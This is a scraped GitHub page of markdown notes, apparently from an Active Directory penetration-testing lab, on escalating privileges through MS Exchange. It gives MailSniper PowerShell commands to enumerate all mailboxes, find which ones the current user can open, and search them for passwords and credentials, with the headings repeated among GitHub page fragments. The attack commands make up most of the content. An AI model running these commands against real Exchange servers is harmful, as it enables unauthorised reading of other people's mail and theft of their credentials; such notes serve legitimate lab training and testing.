Domain Privilege Escalation [ MS Exchange ]

Methodology/Steps

Load in MailSniper using powershell

Enumerate and pull all the emails

Save all the emails in a file called emails.txt

Now check if you have access to any other emailboxes

Check for data inside the email address where the body contains data like password or creds

MailSniper

1. Enumerate all mailboxes

Get-GlobalAddressList -ExchHostname us-exchange -verbose -UserName us\studentuser1 -password <password> -

2. Enumerate all mailboxes we have access to (means current user)

Invoke-OpenInboxFinder -EmailList C:\AD\Tools\emails.txt -ExchHostname us-exchange -verbose

3. Once we have identified mailboxes where we can read emails, use the following to read emails. The below command looks for terms like pass, creds, credentials from top 100 emails of :

Invoke-SelfSearch -Mailbox pwnadmin@techcorp.local -ExchHostname us-exchange -OutputCsv .\mail.csv

Alternatively, using exchange manager (Organization Management) or exchange user (Exchange Trusted Subsystem) privileges also allows us to read the emails!

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

4-MS-Exchange.md

4-MS-Exchange.md

Domain Privilege Escalation [ MS Exchange ]

Methodology/Steps

MailSniper

1. Enumerate all mailboxes

2. Enumerate all mailboxes we have access to (means current user)

3. Once we have identified mailboxes where we can read emails, use the following to read emails. The below command looks for terms like pass, creds, credentials from top 100 emails of :

Files

4-MS-Exchange.md

Latest commit

History

4-MS-Exchange.md

File metadata and controls

Domain Privilege Escalation [ MS Exchange ]

Methodology/Steps

MailSniper

1. Enumerate all mailboxes

2. Enumerate all mailboxes we have access to (means current user)

3. Once we have identified mailboxes where we can read emails, use the following to read emails. The below command looks for terms like pass, creds, credentials from top 100 emails of :